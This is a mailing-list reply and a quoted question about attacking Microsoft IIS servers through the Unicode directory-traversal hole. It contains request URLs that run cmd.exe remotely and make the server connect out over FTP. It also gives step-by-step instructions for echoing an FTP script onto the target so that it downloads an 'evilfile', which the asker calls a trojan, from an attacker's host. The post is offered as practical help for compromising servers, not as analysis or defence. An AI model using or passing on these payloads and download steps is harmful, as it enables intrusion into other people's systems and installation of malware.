Re: [unicode / iis4]

[white hat eagle <whitehateagle () USA NET>]

Hi folks,
in order to download a file by using mdac.pl or mdac2.pl or iis/unicode
exploit you should create a file, say, ftptmp.txt and you should issue
the following command
 ftp -n -s:ftptmp.txt
where the -n switch will suppress the interactive logon mode and -s switch
will contain the commands and user credentials.
and the contents of the ftptmp.txt should be
 open x.x.x.x [or the name of the ftp server]
 user
 anonymous
 me () hacker com
 bin
 get evilfile
 bye
to create this file you should use the "echo" command and redirect the
content to the file ftptmp.txt as follows
 echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
and so on.
good luck,
whe-

Mad Zigy <zigy () GLOBAL CO ZA> wrote:
Well i have been able to use msadc2.pl yet the 
commands i give do not work. so i tried the other way 
by doing
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
.txt
and all it did was say: The parameter is incorrect. 
so then i though maybe we cant have a > in the string 
so i found the hex of it and tried
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+%
3e+c:\test.txt
yet it still gave me the same: The parameter is 
incorrect. 
I have been able to make it ftp into my pc by
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+hostname
but i cant make it login as i need to echo a script 
which i can run http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+-
s:c:\ftp.txt+hostname so that it will login and 
download the exe / trojan
Thankz zigy!


____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1